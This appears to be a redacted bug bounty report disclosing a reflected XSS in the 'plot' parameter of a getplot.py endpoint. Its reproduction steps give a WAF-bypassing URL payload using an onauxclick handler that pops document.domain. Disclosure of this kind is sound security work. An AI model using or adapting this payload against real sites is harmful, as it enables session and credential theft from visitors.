Reflected XSS | https://████████

Summary Hi team, there's a reflected XSS on https://████ using the `plot` param. There's a WAF in place but it's possible to bypass it. Steps to reproduce 1. Click https://██████████/fcgi-bin/getplot.py?plot=aaa%3Ch1%20onauxclick=confirm(document.domain)%3ERIGHT%20CLICK%20HERE 2. Observe the popup showing document.domain when right clicking "RIGHT CLICK HERE" ███ ## Impact The attacker can trigger remote code execution on the victim’s browser, and steal credentials, sessions, and potentially send malware to the victim. ## System Host(s) ██████ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce 1. Click https://████████/fcgi-bin/getplot.py?plot=aaa%3Ch1%20onauxclick=confirm(document.domain)%3ERIGHT%20CLICK%20HERE 2. Observe the popup showing document.domain when right clicking "RIGHT CLICK HERE" ## Suggested Mitigation/Remediation Actions